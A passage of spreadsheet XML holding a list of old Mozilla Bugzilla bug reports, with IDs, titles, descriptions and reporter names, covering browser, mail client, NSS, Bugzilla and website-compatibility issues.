| Error: uncaught exception: [Exception... Component returned failure | code: 0x80004005 (NS_ERROR_FAILURE) | [nsIStringBundle.GetStringFromName]  nsresult: 0x80004005 | (NS_ERROR_FAILURE)  location: JS frame :: XStringBundle :: getString | :: line 17  data: no]
| Error: Undefined entity
| Source file: chrome://messenger/content/preferences/advanced.xul
| Line: 111 Column: 17
| Source: &lt;checkbox id=enableGloda
| Error: this._tree is null
| Source file: chrome://messenger/content/folderPane.js
| Line: 649</t>
  </si>
  <si>
    <t>SEAMONKEY-580663</t>
  </si>
  <si>
    <t>Remove old bookmarks system code</t>
  </si>
  <si>
    <t>Once places bookmarks have landed we should remove the old bookmarks system.
This is a split-off of part 6 of bug 498596 for easier review (as now that
part is isolated here).</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-359347</t>
  </si>
  <si>
    <t>many builds not reporting to tinderbox</t>
  </si>
  <si>
    <t>Since the tinderbox server upgrade many builds are not reporting.  See:
http://tinderbox.mozilla.org/showbuilds.cgi?tree=SeaMonkey
 - of the 5 builds only lhasa and nye have reported anything since 7:24pm
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Firefox
 - argo-vm (twice) prometheus-vm and bl-bldxp01 are not reporting
I've closed the tree because of this.</t>
  </si>
  <si>
    <t>CORE-157444</t>
  </si>
  <si>
    <t>{inc}clear (from ) lost on incremental reflow</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U FreeBSD i386 en-US rv:1.1a+) Gecko/20020714
BuildID:    2002071420
When going to the listed URL the page is rendered incorrectly (see attached
screen shot gc-1stload.png) with some text appearing in the top bar. Reloading
the page solves the problem though sometimes two reloads are necessary.
Also seen on fairly recent Windows builds.
Reproducible: Always
Steps to Reproduce:
1. Go to this URL: http://www.geekculture.dk/arkiv.php3?reviewid=1230
2. Notice how it looks bad
3. Push the reload button
4. Notice how it looks good (if not repeat from 3)
If there is no problem on first load try selecting other articles from
http://www.geekculture.dk/ and see if it happens. (Sorry the contents of the
site are in Danish only.)
Actual Results:  First load looks weird (as in gc-1stload.png) second load is
fine (as in gc-2ndload.png).
Expected Results:  Even first load should look fine.
I have verified the source code on first and second load and this is the very
same code so the server is not generating different pieces of code.
This happens using both classic and modern theme. Not tested with other themes.</t>
  </si>
  <si>
    <t>jf</t>
  </si>
  <si>
    <t>CORE-464838</t>
  </si>
  <si>
    <t>Tp3 regression on 2008-11-11</t>
  </si>
  <si>
    <t>We seem to have a Tp3 regression on at least some of the Mac and Linux machines (e.g. qm-plinux-fast03).  The checkin range is:
http://hg.mozilla.org/mozilla-central/pushloghtml?startdate=2008-11-11+19%3A00%3A00&amp;enddate=2008-11-11+20%3A00%3A00
Out of those I'd expect the DNS prefetch to be the most likely culprit.
Not sure we need to worry about this for 1.9.1b2 but we should figure out what's up here.  One test I'd suggest is commenting out the prefetch call in nsHTMLAnchorElement::BindToTree to see what impact if any it has.  It's my best guess for the regression source.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-88081</t>
  </si>
  <si>
    <t>Focus doesn't work properly in the ActiveX control</t>
  </si>
  <si>
    <t>The activex control doesn't allow form fields to be selected or typed into.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-375468</t>
  </si>
  <si>
    <t>Previous window does not activate (get its focus back) after closing and saving a message from Compose</t>
  </si>
  <si>
    <t>[NetscapeÂ® Communicator 4.8 : en-20020722] (release) (W2Ksp4)
No bug.
[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.13) Gecko/20060414] (release) (W2Ksp4)
[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.12pre) Gecko/20070322 SeaMonkey/1.0.8] (nightly) (W2Ksp4)
[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.1.4pre) Gecko/20070322 SeaMonkey/1.1.1] (nightly) (W2Ksp4)
[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a4pre) Gecko/20070326 SeaMonkey/1.5a] (nightly) (W2Ksp4)
[Mozilla Thunderbird version 2.0pre (20070326)] (nightly) (W2Ksp4)
1. Start Browser or MailNews (or TB).
2. Ctrl+M to compose a new message.
3. Type something in the body (for example).
4. Alt+F4 (or use the mouse...) to close the window.
5. Get the alert: Save the message. [No bug when using Don't save !]
5r. The previous window does not fully get the focus back: the icon in the taskbar is active but the window itself remains grayed/background.
Workaround:
Press Alt+Tab once to reactivate the window.
(Same with a brand new SM account.)
[Mozilla Thunderbird version 3 alpha 1 (20070326)] (nightly) (W2Ksp4)
Can't test at the moment because of bug 372706
but presumably has the bug too.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-496215</t>
  </si>
  <si>
    <t>Help Fix Sidebar on blog.mozilla.com</t>
  </si>
  <si>
    <t>Hi Jeremy if you look at this page:  http://blog.mozilla.com/ you'll notice that the sidebar has migrated to the very bottom of the page.  Would you be able to help direct it back to the right place?  Let me know if I can help with anything.  I'm hoping it won't take too much of your time. Thanks in advance.</t>
  </si>
  <si>
    <t>tshahian</t>
  </si>
  <si>
    <t>CORE-167601</t>
  </si>
  <si>
    <t xml:space="preserve">[object] Support </t>
  </si>
  <si>
    <t>Submitting bug to track the coding to support pluginspage in param element.
The param element coding:
The default plug-in functionality should be the same as with the embed element
and the codebase attribute hack. This is to provide a mechanism to phase out the
codebade attribute hack.</t>
  </si>
  <si>
    <t>rubydoo123</t>
  </si>
  <si>
    <t>BUGZILLA-198019</t>
  </si>
  <si>
    <t>Bugzilla Guide contains no end-user docs for Flags</t>
  </si>
  <si>
    <t>It was brought up on the developers list that there aren't any end-user docs for
Flags in the Guide...</t>
  </si>
  <si>
    <t>BUGZILLA-100100</t>
  </si>
  <si>
    <t>Undefined value as ARRAY reference in enter_bug.cgi</t>
  </si>
  <si>
    <t>It is possible if the product is not defined to get an error:
  Undefined value as ARRAY reference in enter_bug.cgi line 244
This can occur if you are not logged into Bugzilla and attempt to enter a new
bug.  Once logged in and redirected to the enter_bug.cgi script the product
information is not present.  The check is for @{$::components{$product}} and if
the product is invalid then the entry in the components array will be
undefined and you are attempting to use the undefined value as an array
reference.</t>
  </si>
  <si>
    <t>stuartd</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-274505</t>
  </si>
  <si>
    <t>404 error does not result in xforms-link-exception for external schema</t>
  </si>
  <si>
    <t>404 error does not result in xforms-link-exception for external schema
the problem appears to be caused by the fact that XMLHttpRequest does not
generate an error event for 404 responses or other HTTP error codes.  it
reserves that event for network level errors like host not found connection
refused etc.
we could solve this problem several ways.  we could either fix XMLHttpRequest or
we could fix the schema loader to inspect the HTTP response code via the API
provided on XMLHttpRequest.</t>
  </si>
  <si>
    <t>NSPR-198158</t>
  </si>
  <si>
    <t>Backport Large file and Sendfile fixes to NSPR 4.1 branch</t>
  </si>
  <si>
    <t>There are a collection of bugs Michael Hein has tasked me with
backporting to NSPRPUB_RELEASE_4_1_BRANCH.  These are from a
list of bugs identified by the SunOne webserver team.
84361 large file support
http://bugzilla.mozilla.org/show_bug.cgi?id=84361
132812 Need to handle the EINTR error from the sendfilev() system call
http://bugzilla.mozilla.org/show_bug.cgi?id=132812
132208 Implement PR_SendFile() with sendfile() and TCP_CORK
http://bugzilla.mozilla.org/show_bug.cgi?id=132208
132940 The various SendFile functions in ptio.c should use pt_MapError
http://bugzilla.mozilla.org/show_bug.cgi?id=132940</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-343700</t>
  </si>
  <si>
    <t>set the multiplicable flag on the Firefox product's review flag</t>
  </si>
  <si>
    <t xml:space="preserve"> hmm how do I get first review/second review boxes . . .
 tony it depends on which component you're patching.  They have different review requirements reflected in the Bugzilla boxes.
 oh the Firefox product doesn't have addl-review
 it should
 oh is there a work around so I can add a second reviewer?
 not really
 heh
 you can use super-review and say using this flag because bugzilla isn't set up right
 ok
 gavin_: it's trivial to configure bugzilla so that multiple review flags can be set on a single patch
 myk: yeah but if no one's going to do it it may as well be impossible :)
 or maybe no one has ever asked
 maybe I should ask
 (instead of complaining about it)
 gavin_: right!
 gavin_: just ask for the multiplicable flag to be set on the review flag type for the Firefox product
This is that request.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-282253</t>
  </si>
  <si>
    <t>JS Console displays empty message after clearing it</t>
  </si>
  <si>
    <t>To reproduce:
1. Open JS Console
2. Click on Clear
3. Observe empty message
This regressed between 2005-02-07-06 and 2005-02-08-06
Bonsai link:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=SeaMonkeyAll&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-02-07+05%3A00%3A00&amp;maxdate=2005-02-08+08%3A00%3A00&amp;cvsroot=%2Fcvsroot</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-3892</t>
  </si>
  <si>
    <t>I get an assert error from gtk in apprunner</t>
  </si>
  <si>
    <t>When I startup apprunner the browser shows up but after a little
while it prints out an error message in GTK.
Adding menu listener to [Help Contents]
Adding menu listener to [How To Tutorial]
Adding menu listener to [Help Channel]
Adding menu listener to [Software Updates]
Adding menu listener to [Technical Support]
Adding menu listener to [Release Notes]
Adding menu listener to [About Communicator Prototype]
Gtk-CRITICAL **: file gtkbox.c: line 332 (gtk_box_pack_start): assertion
`child-&gt;parent == NULL' failed.
After that nothing seems to work.
I was running under Solaris 2.6 on a Sparc box. I compiled with egcs
1.1.1 and I was using glib-1.2.0 and gtk+-1.2.0.</t>
  </si>
  <si>
    <t>dejong</t>
  </si>
  <si>
    <t>SEAMONKEY-193913</t>
  </si>
  <si>
    <t>using Back Button will freeze or crash Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U OpenVMS Digital_Personal_WorkStation_ en-US rv:1.3b) Gecko/20030207
Build Identifier: Mozilla/5.0 (X11 U OpenVMS Digital_Personal_WorkStation_ en-US rv:1.3b) Gecko/20030207
Using the Back button may cause Mozila to freeze and in other instances to
crash with a stack dump. It does not happen always but quite frequently.
Another problem may have to do something with this problem too. After loading a
picture in a new tab or better several pictures in several tabs I tried to
save these pictures to disk. After I tried to save the second picture Mozilla
crashed with a stack dump. This happens consistantly.
This is a new problem with 1.3B 1.3A was very stable.
My guess is that it has something to do with the interaction between the browser
and the cache.
Reproducible: Sometimes
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>munk</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-192111</t>
  </si>
  <si>
    <t>ardemgaz.com - Arkansas Online -- Enhanced version doesn't operate with Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030130
The site warns you that it will not work with browser.  It is a new way that
some newpapers are going to in order to make viewing the newspaper just like the
actual physical experience.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>webnut4</t>
  </si>
  <si>
    <t>SEAMONKEY-158438</t>
  </si>
  <si>
    <t>Remove 'encrypting versus obscuring' pref</t>
  </si>
  <si>
    <t>I'm trying to reduce the number of prefs we have in our product because it's
gotten unwieldy. This pref (accessible from the Privacy &amp; Security &gt; Passwords
panel) is ridiculously geeky.  It asks the user to choose between two
implementation details that he doesn't and shouldn't have to care about: do you
want to choose this less secure but more convenient method or this more secure
(but still breakable!) and less convenient method?  Internet Explorer caters to
the mainstream user and doesn't burden him with such complexity.  We should make
a decision as to what's best and stick to it.  Personally I'd recommend just
sticking to obscuring (the current default anyways) since both are fallible.</t>
  </si>
  <si>
    <t>SEAMONKEY-132380</t>
  </si>
  <si>
    <t>Merge Schedule and Notify tabs in Bookmark Properties</t>
  </si>
  <si>
    <t>I spoke to first Ben and then rjc about this on IRC a few weeks ago. rjc agreed.
The idea is to merge the Schedule and Notification tabs for a few reason:
a) They are closely related. In fact they depend on each other when a checkbox
to enable Scheduling is not set the whole Notification tab is disabled.
b) It makes the dialog faster to load (I think). This is usually not an issue
but I saw this bug a few days ago that specifically said this dialog takes too
long time to load...
c) It makes sense.  :-)
I'll try to work on it and come up with a patch.</t>
  </si>
  <si>
    <t>CALENDAR-322831</t>
  </si>
  <si>
    <t>Extra parameters in properties not preserved</t>
  </si>
  <si>
    <t>If we try to roundtrip something like
LOCATIONX-LOCATION-ID=V0-001-000102689-1@evdb.com:Delta Center
the X-LOCATION-ID part is lost.  It comes out as
LOCATION:Delta Center</t>
  </si>
  <si>
    <t>NSS-221743</t>
  </si>
  <si>
    <t>certificate usage macro mismatch in CERT_VerifyCertificate</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
Attached code is a part of CERT_VerifyCertificate.  The underlined macro is from
CERT_VerifyCert family which is enum (certUsageSSLServer == 1) while
certificateUsage family is bit map based.  I checked it in nss3.7 as well as 3.8
and both have the same code.  Could it be certificateUsageSSLServer by any chance?
certvfy.c
1211 SECStatus
1212 CERT_VerifyCertificate(CERTCertDBHandle *handle CERTCertificate *cert
1213         PRBool checkSig SECCertificateUsage requiredUsages int64 t
1214         void *wincx CERTVerifyLog *log SECCertificateUsage* returnedUsages)
1215 {
                [...]
1257
1258     /* make sure that the cert is valid at time t */
1259     allowOverride = (PRBool)((requiredUsages &amp; certUsageSSLServer) ||
                                                    ==================
1260                              (requiredUsages &amp;
certificateUsageSSLServerWithStepUp))
1261     validity = CERT_CheckCertValidTimes(cert t allowOverride)
1262     if ( validity != secCertTimeValid ) {
1263         LOG_ERROR(logcert0validity)
1264         return SECFailure
1265     }
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>norikoyasuo</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-485565</t>
  </si>
  <si>
    <t>Update .htaccess on support-stage</t>
  </si>
  <si>
    <t>As per bug 483026 .htaccess needs to be updated.</t>
  </si>
  <si>
    <t>BUGZILLA-508823</t>
  </si>
  <si>
    <t>template_inner should not have to be reset after calling it with a language-specific variable</t>
  </si>
  <si>
    <t>Right now after we do Bugzilla-&gt;template_inner($lang) we have to do Bugzilla-&gt;template_inner() later. We should not have to do this.</t>
  </si>
  <si>
    <t>CORE-356045</t>
  </si>
  <si>
    <t>xul tree-table cells in the first row are exposed in a mess</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7
Build Identifier: version 3 alpha 1 (20061009)
Accessibility information about the message-header tree table is incorrect:
1. The tree-table reports that it only has three columns
2. In the first row only the information starting from the Date column is available.
This problem means that assistive technologies like screen readers and Braille cannot present correct information about message headers.  In other words the message-header tree-table is inaccessible to people with visual disabilities.
To duplicate this but . and find the message-header table.
Reproducible: Always
Steps to Reproduce:
1. Run at-poke with Thunderbird version 3
2. Expand the at-poke information for Thunderbird 
3. Examine the tree-table information for the message headers
You can also run the Orca screen reader with Thunderbird version 3. Navigate to the message headers. As you down-arrow through the headers Orca does not speak the message subject or sender. It will only speak the date and the two columns after the date.
Actual Results:  
Orca does not speak the message subject or sender. It will only speak the date and the two columns after the date.
Expected Results:  
Orca should speak all of the message-header information</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-228080</t>
  </si>
  <si>
    <t>bouyguestelecom.fr - valider doesn't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 fr rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 fr rv:1.5) Gecko/20031007 Firebird/0.7
click on valider on this web page
it doesn't work
http://www.servicevoyage.bouyguestelecom.fr/eroamingsv2/jsp/destination.jsp?logicalNamePrec=accueil#
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>lequid</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-190687</t>
  </si>
  <si>
    <t>absolutearts.com - pull down sub menu in menu bar won't open</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.0.2) Gecko/20021216
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.0.2) Gecko/20021216
in the page when you position the cursor (with IE) on the items of the
horizontal menu bar at the top of page a sub-menu will show with other items
contained inside
Reproducible: Always
Steps to Reproduce:
1. position cursor on menu bar
2.
3.
Actual Results:  
nothing
Expected Results:  
cause pull down sub menu pop up</t>
  </si>
  <si>
    <t>aneckels</t>
  </si>
  <si>
    <t>MOZILLA.ORG-78004</t>
  </si>
  <si>
    <t>NSS RelEngr needs CVS account</t>
  </si>
  <si>
    <t>I'm the NSS Release Engineer and occasionally need write access to
the NSS source tree modules.
Wan-Teh Chang (wtc@netscape.com) is my voucher.</t>
  </si>
  <si>
    <t>tfox</t>
  </si>
  <si>
    <t>CORE-337770</t>
  </si>
  <si>
    <t>Upgrade to NSS 3.11.2 pre-release</t>
  </si>
  <si>
    <t>We need to upgrade the NSS version on the Mozilla
trunk and MOZILLA_1_8_BRANCH to the current
NSS_3_11_BRANCH which is NSS 3.11.2 pre-release.</t>
  </si>
  <si>
    <t>CORE-209607</t>
  </si>
  <si>
    <t>Should not ever call GlobalWindowImpl::SetNewDocument(nsnull)</t>
  </si>
  <si>
    <t>We need to clean up the code that calls SetNewDocument with a null
nsIDOMDocument argument.  In bug 163645 I am going to add a new
|nsCOMPtr mNavigatorHolder| member because we need
to hold on to the navigator in between SetNewDocument calls in between which we
may be GC'd.  If we fix this it would remove the need for this as we could
simply re-root the navigator object in the same function without having to worry
about potential GC's in between calls.</t>
  </si>
  <si>
    <t>CORE-406416</t>
  </si>
  <si>
    <t>No down arrow on next button in table cell properties dialog with rows selected</t>
  </si>
  <si>
    <t>Created attachment 291068
Fix v.1
There are (or should be) a few rules for having your file scream in all caps about it being LOCKED DOWN chief among them that you change your address within four years of it becoming invalid and that you not allow typos which refer to images that don't exist to persist for six years.
STR:
1. Insert - Table - OK
2. Click in a cell Format - Table Cell Properties...
3. Choose Row in the Selection menulist
4. Note that Previous has an arrow-up but Next doesn't have an arrow-dn</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-529588</t>
  </si>
  <si>
    <t>tracking bug for the Firefox 3.6 Reviewer's Guide in French</t>
  </si>
  <si>
    <t>Created attachment 413121
Reviewer's Guide - EN version
This is a bug to track the l10n of the Firefox 3.6 Reviewer's Guide to French. Please find the content attached.</t>
  </si>
  <si>
    <t>isandu</t>
  </si>
  <si>
    <t>CORE-144534</t>
  </si>
  <si>
    <t>onReset is not fired after calling reset() method through Javascript.</t>
  </si>
  <si>
    <t>OnReset does not get fired if we reset form using document.formname.reset() 
method.
BUILDS: 05-12-20-7.0PR1 &amp; ALSO ON Regular Trunk.
STEPS TO REPRODUCE:
1] Load Testcase I'm going to attach.
2] Enter something in textbox.
3] Click button Regular Reset 
4] See alert Reset Works Fine!!!!!!!!! Click OK on alert. [Now form gets 
Reset]
5] Enter something in textbox again.
6] Now click button Reset Using Regular Button Through Javascript &lt;input 
type='button'&gt;
7] You will see that Form gets Reset but you never see alert.
You should see alert on clicking both buttons because we are calling alert 
onReset of the form.
EXPECTED RESULTS:
We should see alert showing Reset Works Fine!!!!!!!!! on clicking both 
buttons.
ACTUAL RESULTS:
We do not see alert showing Reset Works Fine!!!!!!!!! on clicking second 
button. Form gets reset so reset() method is working fine but onReset event 
never gets fired in this case.</t>
  </si>
  <si>
    <t>CORE-474758</t>
  </si>
  <si>
    <t>[@ FcFontSetSort] crashes on Solaris</t>
  </si>
  <si>
    <t>FcFontSetSort (FcConfig *config FcFontSet **sets intnsets FcPattern *pattern FcBool trim FcCharSet **csp FcResult *result)
config is not used on Linux but it is used on Solaris.
And it will crash if it is NULL.
I think it is a bug of font config lib on Solaris but we need to workaround otherwise Firefox could not be launched with current font config lib on Solaris.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-173401</t>
  </si>
  <si>
    <t>update d/l mgr and file handling QA docs with platform diff info</t>
  </si>
  <si>
    <t>d/l manager diff: on Mac the download progress dlg opens by default on
win32/unix the d/l manager window opens by default.
i remembered some platform differences (mac vs win32/unix) re: file handling in
netscape and mozilla. i'll go thru the online QA docs and update them if needed.
1. by default on Mac when you open a file with a helper application:
a. the download progress dlg closes automatically when done with downloading the
file locally. on win32/unix you have the choice (by default) to toggle this on
or off.
b. after quitting netscape (or mozilla) the file that was downloaded in (a)
--typically in your default download folder you set in IC-- will NOT be deleted
automatically. on win32/unix such files are automatically deleted upon quitting.
2. when downloading a file via contextual-click (ie selecting save link target
as from context menu) the download progress dlg closes automatically when
done. on win32/unix you have the choice (by default) to toggle this on or off</t>
  </si>
  <si>
    <t>FIREFOX-522668</t>
  </si>
  <si>
    <t>Integrate PlacesDBUtils.checkAndFixDatabase() in about:support</t>
  </si>
  <si>
    <t>Something we can't do for 3.6 due to string freeze but cool for next version.</t>
  </si>
  <si>
    <t>gasolin</t>
  </si>
  <si>
    <t>CORE-17175</t>
  </si>
  <si>
    <t>[BiDi] Can not see hebrew fonts iso-8859-8 -6 not implemented</t>
  </si>
  <si>
    <t>I am not talking about implementing the BiDi algorithms or proper
Hebrew/Bidi support at the very least mozilla should
have iso-8859-8 character supported and better yet auto-detected.
Most pages in hebrew use visual layout i.e. they are already
layed-out with respect to BiDi and even if they are not reading
backwords is better than not reading at all.</t>
  </si>
  <si>
    <t>moshev</t>
  </si>
  <si>
    <t>CORE-161243</t>
  </si>
  <si>
    <t>[FIX]remove the  NS_FORM_NOTSET and NS_FORM_NOTOK nsresult values</t>
  </si>
  <si>
    <t>We can just punt these...</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-435956</t>
  </si>
  <si>
    <t>Prevent hosts from RSVPing to their own events</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-391639</t>
  </si>
  <si>
    <t>Eliminate status bar at the bottom of the window</t>
  </si>
  <si>
    <t>Since we don't use the status bar for anything anymore we should remove it it just takes up space and is unsightly.</t>
  </si>
  <si>
    <t>SEAMONKEY-481958</t>
  </si>
  <si>
    <t>Correct relationship between sort marker/arrow and sort direction in Cookie Manager</t>
  </si>
  <si>
    <t>In bug 476175 it was noticed that the sort marker/arrow is always pointing in the wrong direction. Example: By default the tree is sorted ascending by Site (host) but the sort marker shows the opposite (descending order). The mentioned bug didn't change that it has been like that before.
The sortDirection attribute of the domainCol (cookieViewer.xul) needs to be switched to ascending as part of this bug but it's not enough: clicking any column header (clicking the same again to switch the sort direction) will show that the actual problem lies in the sorting code (cookieViewer.js probably CookieColumnSort() maybe SortTree()).</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-298553</t>
  </si>
  <si>
    <t>Document shell service changes (bug 274374)</t>
  </si>
  <si>
    <t>* Set default browser set as desktop... and mail integration are now exposed
on mac (But on mac the menu item doesn't mention new messages etc).
 * Set as wallpaper was renamed to Set as desktop backgorund.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-483090</t>
  </si>
  <si>
    <t>Spelling Suggestions for the Firefox 3.1 Beta 3</t>
  </si>
  <si>
    <t>From QMO Feedback (http://quality.mozilla.org/events/2009/mar/13/firefox-31-beta-3-test-day):
1. In the first screen: Instalado de Mozilla... instead of Alkaku should be Alklaku.
2. In tre screen Gisdatigo de Firefox... instead of informos al vi should be informos vin.
3. In the screen Ghisdatigo de programo the text is not translated into Esperanto (There are no updates available...).</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-525437</t>
  </si>
  <si>
    <t>clean up LIR_call</t>
  </si>
  <si>
    <t>Proposal to clean up encoding of LIR_call (icall fcall etc).
1. Move argument references into a separate chunk of memory allocated by LirBuffer._allocator (thus guaranteeing same lifetime as LIR).  This makes the LInsC fixed sized.
2. Drop LInsC.argc since it is redundant with CallInfo and not needed for fast traversal of LirBuffer anymore.  For such a small field (4 bits max) its a waste to use up a whole redundant field.
There is also redundancy between the opcode and CallInfo._argtypes but I think that's worth preserving so that the opcode by itself indicates the type of the call result.  (Although one could argue that type checking arguments requires decoding argtypes anwyay).</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-188897</t>
  </si>
  <si>
    <t>maptech.com - tools are covered by map</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
The map display area covers the tools along the bottom. Only the text is visible
Click to Zoom Scale Zoom The drop down boxes can not be seen
Reproducible: Always
Steps to Reproduce:
1. Visit URL
2. Look below map for scale and zoom tools
3.
Actual Results:  
Scale and Zoom widgets drawn underneath map
Expected Results:  
Drawn widgets below map on screen
Standard theme no crash ...</t>
  </si>
  <si>
    <t>j.bugzilla2</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-338028</t>
  </si>
  <si>
    <t>Installing extensions accesses observer service from off-thread</t>
  </si>
  <si>
    <t>In a debug build install http://users.blueprintit.co.uk/~dave/content/firefox/nightly/nightly-1.0.3.xpi and note the nsObserverService not threadsafe asserts that fire.
We should really fix this otherwise extension install has a good shot at corrupting nsObserverService internal data structures which would be unpleasant and might explain the free() errors I get from libc every so often while installing extensions.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-436899</t>
  </si>
  <si>
    <t>SVN access to projects/spreadfirefox.com/trunk/worldrecord/locale/ru</t>
  </si>
  <si>
    <t>I need SVN access to projects/spreadfirefox.com/trunk/worldrecord/locale/ru for localization.
My SVN user is unghost@mozilla-russia.org
Requesting approval based on bug 436135 comment #47</t>
  </si>
  <si>
    <t>CORE-367226</t>
  </si>
  <si>
    <t>Option to change JS_THREADED_INTERP without changing the code</t>
  </si>
  <si>
    <t>Currently JS_THREADED_INTERP macro in jsinterp.c is defined as:
#if JS_VERSION &gt;= 160 &amp;&amp; (                                                    \
    __GNUC__ &gt;= 3 ||                                                          \
    (__IBMC__ &gt;= 700 &amp;&amp; defined __IBM_COMPUTED_GOTO) ||                       \
    __SUNPRO_C &gt;= 0x570)
# define JS_THREADED_INTERP 1
#else
# undef JS_THREADED_INTERP
#endif
That does not allow to redefine the macro when invoking the compiler without changing the code. It would be nice to permit that for debugging/testing.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-366996</t>
  </si>
  <si>
    <t>Right-Click Spell Fix Complications</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.2pre) Gecko/20070114 Camino/1.1a2+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.2pre) Gecko/20070114 Camino/1.1a2+
In a recent build a fix was put into place that would simulate a double-click when user right-clicked on a word in order to have the spell check function correctly.
The problem with this is that if you try and select a portion of text and then right click somewhere within it in order to copy the selection it will unselect the selection and select just the word you right click on.
Reproducible: Always
Steps to Reproduce:
1. Select a line of text in a text field.
2. Right click on part of it.
Actual Results:  
Your selection is replaced with a selection of just the word you right-clicked.
Expected Results:  
Brought up a normal contextual menu while keeping your original selection intact.
This is not extremely serious and the fix for the spell check even with this problem is an improvement over the previous build however if there's a way to fix this as well that would be nice.</t>
  </si>
  <si>
    <t>survivor</t>
  </si>
  <si>
    <t>FIREFOX-372044</t>
  </si>
  <si>
    <t>Paste command moves an item rather than copying it</t>
  </si>
  <si>
    <t>The paste command now moves an item rather than moving it.</t>
  </si>
  <si>
    <t>CORE-506433</t>
  </si>
  <si>
    <t>reduce the number of GdkWindows used in nsIWidgets</t>
  </si>
  <si>
    <t>Child nsIWidgets usually have two GdkWindows.  Toplevel nsIWidgets have four.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-113817</t>
  </si>
  <si>
    <t>shortnews.com -  show/hide not working</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:0.9.6) Gecko/20011120
BuildID:    2001112009
This will most likely be moved to Tech Evangelism but since some of the features
and the layout of the page aren't working right I placed them in the layout/page
content section. On the website http://www.ihatenetscape.com/ there are various
problems Now firstly as you can see the border colors are incredibly messed up.
This is an IE specific tag true the tag used is: bordercolor=#990000 with
border=1
This is quoted from an article and should be read. The URL to read the rest is
http://www.ihatenetscape.com/articles/articleone.html
Reproducible: Always
Steps to Reproduce:
1. goto http://www.ihatenetscape.com/
2. notice the difference in presentation table structure and the rest of the
problems quoted here http://www.ihatenetscape.com/articles/articleone.html
3.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-310477</t>
  </si>
  <si>
    <t>nsJavaXPTCStub::CallMethod does incorrect JNI CallMethodA calls</t>
  </si>
  <si>
    <t>When I changed the Javaconnect code to properly handle unsigned values in Java
I never changed the CallMethodA calls in nsJavaXPTCStub::CallMethod.  Not
sure how I missed that...</t>
  </si>
  <si>
    <t>CORE-94066</t>
  </si>
  <si>
    <t>nsIScriptContext *foo = ::JS_GetContextPrivate() callers should check for JSOPTION_PRIVATE_IS_NSISUPPORTS</t>
  </si>
  <si>
    <t>Once the fix for bug 82845 is checked in code that gets JSContext private data
